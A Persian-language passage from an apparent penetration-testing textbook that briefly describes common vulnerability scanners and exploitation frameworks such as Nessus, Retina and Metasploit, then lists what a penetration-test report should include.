Nessus: اﻳﻦ ﻧﺮم اﻓﺰار اﺳﻜﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ﺷﺒﻜﻪ اﺳﺖ ﻛﻪ ﺑﻴﺶ از 11000 ﭘﻼﮔﻴﻦ دارد . اﻳﻦ ﻧﺮم اﻓﺰار، داراي ﺑﺮرﺳﻲ ﻫﺎي اﻣﻨﻴﺘﻲ ﻟﻮﻛﺎل و راه دور، ﻣﻌﻤﺎري ﻛﻼﻳﻨﺖ/ ﺳﺮور ﺑﺎ راﺑﻂ ﮔﺮاﻓﻴﻜﻲ GTK ، و زﺑﺎن اﺳﻜﺮﻳﭙﺘﻲ ﺑﺮاي ﻧﻮﺷﺘﻦ ﭘﻼﮔﻴﻦ ﻫﺎي ﻣﻮرد د ﻟﺨﻮاه اﺳﺖ . . 234

GFI LANguard: اﻳﻦ ﻳﻚ اﺳﻜﻨﺮ ﺗﺠﺎري ﺑﺮاي اﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺑﺮاي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ وﻳﻨﺪوز اﺳﺖ . اﻳﻦ ﻧﺮم اﻓﺰار، ﺷﺒﻜﻪ ﻫﺎي IP را اﺳﻜﻦ ﻣﻲ ﻛﻨﺪ ﺗﺎ ﻣﺎﺷﻴﻦ ﻫﺎي در ﺣﺎل اﺟﺮا را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ . اﻳﻦ ﻧﺮم اﻓﺰار ﻣﻲ ﺗﻮاﻧﺪ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎ، ﺑﺮﻧﺎﻣﻪ ﻫﺎي در ﺣﺎل اﺟﺮاي ﺳﻴﺴﺘﻢ ﻫﺎ، ﺳﺮوﻳﺲ ﭘﻚ ﻧﺼﺐ ﺷﺪه ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ، patch ﻫﺎي ﻧﺼﺐ ﻧﺸﺪه و ... را ﻛﺸﻒ ﻛﻨﺪ . .

Retina : ﻳﻚ اﺳﻜﻨﺮ ﺗﺠﺎري آﺳﻴﺐ ﭘﺬﻳﺮي اﺳﺖ . ﻫﻤﺎﻧﻨﺪ Nessus ، اﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻧﻴﺰ ﺗﻤﺎم ﺳﻴﺴﺘﻢ ﻫﺎي ﻳﻚ ﺷﺒﻜﻪ را اﺳﻜﻦ ﻣﻲ ﻛﻨﺪ و ﺗﻤﺎم آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﻛﺸﻒ ﺷﺪه را ﮔﺰارش ﻣﻲ دﻫﺪ . .

CORE IMPACT : ﻣﺤﺼﻮﻟﻲ ﺑﺮاي ﺧﻮدﻛﺎرﺳﺎزي ﻓﺮآﻳﻨﺪ ﺗﺴﺖ ﻧﻔﻮذ اﺳﺖ ﻛﻪ ﺑﻪ ﻋﻨﻮان ﻗﺪرﺗﻤﻨﺪﺗﺮﻳﻦ اﺑﺰار اﻛﺴﭙﻠﻮﻳﺖ ﻣﻄﺮح ﻣﻲ ﺷﻮد ( اﻳﻦ ﻣﺤﺼﻮل ﺑﺴﻴﺎر ﮔﺮان اﺳﺖ ). اﻳﻦ ﻣﺤﺼﻮل داراي ﭘﺎﻳﮕﺎه داده ﺑﺴﻴﺎر ﺑﺰرگ و آﭘﺪﻳﺖ اﺳﺖ ﻛﻪ اﻛﺴﭙﻠﻮﻳﺖ ﻫﺎي ﺣﺮﻓﻪ اي را دارا ﺳﺖ . .

ISS Internet Scanner : ﻳﻚ اﺑﺰار ارزﻳﺎﺑﻲ آﺳﻴﺐ ﭘﺬﻳﺮي در ﺳﻄﺢ اﭘﻠﻴﻜﺸﻦ اﺳﺖ . اﺳﻜﻨﺮ اﻳﻨﺘﺮﻧﺖ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻴﺶ از 1300 ﻧﻮع دﺳﺘﮕﺎه ﺷﺒﻜﻪ از ﻗﺒﻴﻞ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي روﻣﻴﺰي، ﺳﺮورﻫﺎ، روﺗﺮﻫﺎ، ﺳﻮﺋﻴﭻ ﻫﺎ ، ﻓﺎﻳﺮوال ﻫﺎ، دﺳﺘﮕﺎه ﻫﺎي اﻣﻨﻴﺘﻲ، و ... را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ.

X-Scan : ﻳﻚ اﺳﻜﻨﺮ ﺷﺒﻜﻪ اﺳﺖ ﻛﻪ ﺑﺼﻮرت ﭼﻨﺪ ﻧﺨﻲ ﻋﻤﻠﻴﺎت اﺳﻜﻦ آﺳﻴﺐ ﭘﺬﻳﺮي را اﻧﺠﺎم ﻣﻲ دﻫﺪ . اﻳﻦ اﺑﺰار ﻣﻲ ﺗﻮاﻧﺪ ﻧﻮع ﺳﺮوﻳﺲ ﻫﺎ، ﻧﻮع ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎي راه دور و ﻧﺴﺨﻪ آﻧﻬﺎ، و username و ﭘﺴﻮردﻫﺎي ﺿﻌﻴﻒ را ﻛﺸﻒ ﻛﻨﺪ . .

SARA: اﺑﺰار ارزﻳﺎﺑﻲ آﺳﻴﺐ ﭘﺬﻳﺮي اﺳﺖ ﻛﻪ از اﺳﻜﻨﺮ SATAN ﻣﺸﺘﻖ ﺷﺪه اﺳﺖ . آﭘﺪﻳﺖ ﻫﺎي آن دو ﺑﺎر در ﻣﺎه ﻣﻨﺘﺸﺮ ﻣﻲ ﺷﻮد . .

QualysGuard : ﻳﻚ اﺳﻜﻨﺮ آﺳﻴﺐ ﭘﺬﻳﺮي ﺗﺤﺖ وب اﺳﺖ . ﻛﺎرﺑﺮان ﻣﻲ ﺗﻮاﻧﻨﺪ از ﻃﺮﻳﻖ اﻳﻨﺘﺮﻓﻴﺲ وب ﺑﻪ آن وﺻﻞ ﺷﻮﻧﺪ . اﻳﻦ اﺑﺰار، ﺑﻴﺶ از 5000 آﺳﻴﺐ ﭘﺬﻳﺮي را ﭼﻚ ﻣﻲ ﻛﻨﺪ . .

SAINT: اﺑﺰاري ﺗﺠﺎري ﺑﺮاي ارزﻳﺎﺑﻲ آﺳﻴﺐ ﭘﺬﻳﺮي اﺳﺖ . .

235

MBSA: ﻣﺤﺼﻮل ﻣﺎﻳﻜﺮوﺳﺎﻓﺖ اﺳﺖ ﻛﻪ ﺑﺎ دﻳﮕﺮ ﻣﺤﺼﻮﻻت ﻣﺎﻳﻜﺮوﺳﺎﻓﺖ ﺳﺎزﮔﺎري دارد. MBSA ﺑﻪ ﻃﻮر ﻣﺘﻮﺳﻂ ﻫﺮ ﻫﻔﺘﻪ، 3 ﻣﻴﻠﻴﻮن ﻛﺎﻣﭙﻴﻮﺗﺮ را اﺳﻜﻦ ﻣﻲ ﻛﻨﺪ . .

ﻋﻼوه ﺑﺮ اﻳﻦ ﻟﻴﺴﺖ، ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺎ اﺑﺰارﻫﺎي دﻳﮕﺮ اﻛﺴﭙﻠﻮﻳﺖ آﺷﻨﺎ ﺑﺎﺷﻴﺪ : :

Metasploit Framework: ﻧﺮم اﻓﺰار اﭘﻦ ﺳﻮرس ﺑﺮاي اﻳﺠﺎد، ﺗﺴﺖ، و اﺳﺘﻔﺎده از اﻛﺴﭙﻠﻮﻳﺖ اﺳﺖ . .

Canvas: اﺑﺰار ﺗﺠﺎري اﺳﺘﻔﺎده از آﺳﻴﺐ ﭘﺬﻳﺮي اﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﺑﻴﺶ از 150 اﻛﺴﭙﻠﻮﻳﺖ اﺳﺖ.

ﻣﻮارد ﻗﺎﺑﻞ اراﺋﻪ در ﺗﺴﺖ ﻧﻔﻮذ

اﺻﻠﻲ ﺗﺮﻳﻦ ﻣﻮرد ﻗﺎﺑﻞ اراﺋﻪ در ﭘﺎﻳﺎن ﺗﺴﺖ ﻧﻔﻮذ، ﮔﺰارش ﺗﺴﺖ ﻧﻔﻮذ اﺳﺖ . اﻳﻦ ﮔﺰارش ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮارد زﻳﺮ ﺑﺎﺷﺪ : :

• ﻟﻴﺴﺖ ﻳﺎﻓﺘﻪ ﻫﺎي ﺷﻤﺎ، ﺑﻪ ﺗﺮﺗﻴﺐ ﭘﺮﺧﻄﺮﺗﺮﻳﻦ رﻳﺴﻚ • ﺗﺤﻠﻴﻞ ﻳﺎﻓﺘﻪ ﻫﺎي ﺷﻤﺎ • ﻧﺘﺎﻳﺞ ﻳﺎ ﺗﻮﺿﻴﺢ ﻳﺎﻓﺘﻪ ﻫﺎي ﺷﻤﺎ • ﻣﻌﻴﺎرﻫﺎي ﻊﻓر ﻣﺸﻜ ﻞ ياﺮﺑ ﻳ ﺎﻓﺘﻪ ﻫﺎي ﺷﻤﺎ • ﻓﺎﻳﻞ ﻫﺎي ﻻگ اﺑﺰارﻫﺎ ﻛﻪ ﻣﺪرﻛﻲ ﺑﺮ ﻳﺎﻓﺘﻪ ﻫﺎي ﺷﻤﺎﺳﺖ • ﺧﻼﺻﻪ اﺟﺮاﻳﻲ از وﺿﻌﻴﺖ اﻣﻨﻴﺘﻲ ﺳﺎزﻣﺎن • ﻧﺎم ﺗﺴﺖ ﻛﻨﻨﺪه و ﺗﺎرﻳﺦ اﻧﺠﺎم ﺗﺴﺖ • ﻫﺮ ﻳﺎﻓﺘﻪ ﻣﺜﺒﺖ ﻳﺎ ﭘﻴﺎده ﺳﺎزي اﻣﻨﻴﺘﻲ ﺧﻮب

236